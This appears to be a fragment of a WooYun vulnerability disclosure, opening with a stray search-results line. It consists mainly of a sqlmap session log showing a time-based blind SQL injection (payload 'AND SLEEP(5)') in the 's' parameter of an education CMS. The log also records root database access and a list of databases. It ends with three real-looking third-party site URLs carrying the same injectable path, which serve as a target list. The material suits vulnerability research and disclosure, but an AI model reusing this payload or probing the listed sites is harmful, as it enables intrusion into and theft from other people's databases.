WooYun.org

123下一页>百度为您找到相关结果约22个

D:\sqlmap>sqlmap.py -u "http://127.0.0.1/index.php?s=/InfoDetail/infodetail/tted
u_id/10" --dbs --current-user --current-db
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 11:20:13
[11:20:13] [INFO] using 'D:\sqlmap\output\127.0.0.1\session' as session file
[11:20:13] [INFO] testing connection to the target url
[11:20:13] [INFO] testing if the url is stable, wait a few seconds
[11:20:15] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[11:20:15] [INFO] testing if GET parameter 's' is dynamic
[11:20:15] [INFO] confirming that GET parameter 's' is dynamic
[11:20:15] [INFO] GET parameter 's' is dynamic
[11:20:15] [WARNING] heuristic test shows that GET parameter 's' might not be in
jectable
[11:20:15] [INFO] testing sql injection on GET parameter 's'
[11:20:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[11:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:20:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[11:20:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[11:20:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:20:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:20:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:20:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:20:30] [INFO] GET parameter 's' is 'MySQL > 5.0.11 AND time-based blind' inj
ectable
[11:20:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:20:31] [INFO] target url appears to be UNION injectable with 7 columns
[11:20:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:20:33] [INFO] target url appears to be UNION injectable with 7 columns
GET parameter 's' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 91 HTTP(s) requ
ests:
---
Place: GET
Parameter: s
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: s=/InfoDetail/infodetail/ttedu_id/10 AND SLEEP(5)
---
[11:20:40] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[11:20:40] [INFO] fetching current user
[11:20:40] [INFO] retrieved:
[11:20:55] [WARNING] adjusting time delay to 1 second
root@localhost
current user:    'root@localhost'
[11:26:14] [INFO] fetching current database
[11:26:14] [INFO] retrieved: teach_data
current database:    'teach_data'
[11:27:00] [INFO] fetching database names
[11:27:00] [INFO] fetching number of databases
[11:27:00] [INFO] retrieved: 4
[11:27:02] [INFO] retrieved: information_schema
[11:28:33] [INFO] retrieved: mysql
[11:28:59] [INFO] retrieved: teach_data
[11:29:45] [INFO] retrieved: test
available databases [4]:
[*] information_schema
[*] mysql
[*] teach_data
[*] test
[11:30:07] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\127.
0.0.1'
[*] shutting down at: 11:30:07

http://win.51hipt.cn/index.php?s=/Home/NewsDetail/info_detail/ttedu_id/10%27
http://www.wlearn.cn/index.php?s=/InfoDetail/infodetail/ttedu_id/45%27
http://www.yingzaidongmeng.com/index.php?s=/Home/NewsDetail/info_detail/ttedu_id/14%27